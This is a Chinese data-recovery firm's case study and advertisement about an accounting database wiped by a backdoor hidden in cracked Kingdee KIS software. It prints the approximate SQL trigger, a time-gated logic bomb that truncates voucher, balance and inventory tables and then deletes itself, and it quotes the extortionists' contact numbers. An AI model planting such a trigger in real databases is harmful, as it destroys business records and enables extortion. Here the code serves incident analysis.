【客户名称】:山东青岛福隆发纺织品有限公司
【软件名称】:金蝶kis专业版12.2
【数据库版本】:ms sql server 2000 【数据库大小】:1gb 。
【问题描述】:客户贪图便宜,使用破解版财务软件,破解者破解后内藏了后门,清空所有数据的触发器。用了1年时间后,后门触发器被激活,删除了所有 科目余额表、存货余额、存货往来明细账、修改了所有 总账凭证、业务凭证、会计科目、内容为:恢复数据联系qq 735330197,2251434429,使数据库全部瘫痪,所有账目混乱。没有备份,急需年度上报,急需恢复。
【问题分析】:接到电话后,客户发来遭后门修改数据库文件,立即组织对数据库分析工作,发现数据库内有一个后门触发器 t_log_autonumbe ,大致代码内容为:
if (@fglcurryear=2014 and @fglcurrperiod>=1) or (@ficcurryear=2014 and @ficcurrperiod>=1)
begin
if (@flogdays>=15)
begin
truncate table t_voucherentry --删除总账凭证
truncate table t_balance --删除科目余额表
if @fversion='8.0' --版本大于8.0
truncate table icstockbillentry --删除存货出入库明细账
else
truncate table t_cc_stockbillentry --删除库存明细账
drop trigger t_log_autonumber
end
end
go
通过大致代码内容,得知后门删除了哪些东西,用了什么方法!客户数据库文件是msde 为简单模型,没有日志记录,只能在现有mdf文件基础上,进行恢复!通过我们自主研发的提取工具,进行相关删除数据,修改数据反后门操作,得到凭证读写日志文件,科目余额表等于表,通过编写对应的分离程序,进行凭证拼装,成功恢复后门修改数据95%。
【恢复结果】:发回给客户测试验收,反馈数据基本正确,能恢复这个程度,客户很满意!得到客户的极大好评。
【温馨提示】:使用破解版软件,危害很大。居心不良的破解者,可能会留下后门木马,删除修改数据,敲诈钱财。如果商用,请使用正版软件!
【数据工程师】尹军 电话/微信/qq:18302650920 欢迎来人来电咨询洽谈数据恢复。
1、系统崩溃只剩下sqlserver数据文件的情况下的恢复.即无日志文件或者日志文件损坏情况下的恢复
2、sqlserver数据文件内部存在坏页情况下的恢复。
3、在sql server2000、sqlserver2005、sql2008运行在简单日志模式、完全日志模式或者大容量日志记录模式下数据被误(drop、delete、truncate)删除表恢复,updata后的数据恢复等
4、sql serve文件无法附加情况下的数据恢复。
5、sql server数据库被标记为可疑,不可用等情况.
6、sql server2000、sqlserver2005、sql2008数据库sysobjects等系统表损坏无法正常应用情况下的恢复.
7、sql server数据库只有数据文件 没有任何日志的情况下的恢复.
8、sql server数据文件被误删除情况下的恢复.
9、sql server2000、sql server2005、sql2008数据库master数据库损坏而无法正常运行情况下的恢复。
10、sql server还原时报一致性错误,错误823等情况下的数据恢复,各种错误提示的数据库文件修复
11、可恢复因硬盘坏道造成的数据库损坏
12、可修复日志收缩或突然断电后的数据库
13、可恢复多个关系型数据库
14、可恢复sql数据库bkf备份文件以及bak文件
15、磁盘阵列上的sql server数据库被误格式化等情况下的数据库恢复
16、可进行sql server数据库格式化,误删除,所有市面恢复软件无法恢复情况下的恢复,即碎片级数据库提取恢复。
17、可恢复shade勒索病毒文件中毒被加密,数据库文件反敲诈服务。
